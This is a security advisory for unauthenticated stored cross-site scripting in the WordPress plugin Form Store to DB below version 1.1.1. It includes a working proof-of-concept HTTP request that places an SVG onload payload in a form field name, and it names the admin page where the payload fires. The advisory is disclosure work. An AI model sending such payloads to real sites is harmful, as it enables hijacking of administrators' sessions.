
Form Store to DB < 1.1.1 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise or escape the names (keys) of submitted form parameters before outputting them in the stored entry, so an unauthenticated attacker who submits a form with a crafted field name can perform a stored Cross-Site Scripting attack against an administrator who later views that entry.

Proof of Concept

```http
POST /wp-json/contact-form-7/v1/contact-forms/1337/feedback HTTP/2
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470

-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"

Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"

XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"

Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="AA<svg/onload=(alert)(/XSS/)>"

Injected
-----------------------------243715402120191890871051639470--
```

The payload sits in the field name (the `name="..."` of the last multipart part), not in a field value. The XSS triggers when an administrator views the related entry in the admin dashboard (/wp-admin/edit.php?post_type=cf7storetodbs), where the stored key is rendered unescaped.

References

https://wpscan.com/vulnerability/3999a1b9-df85-43b1-b412-dc8a6f71cc5d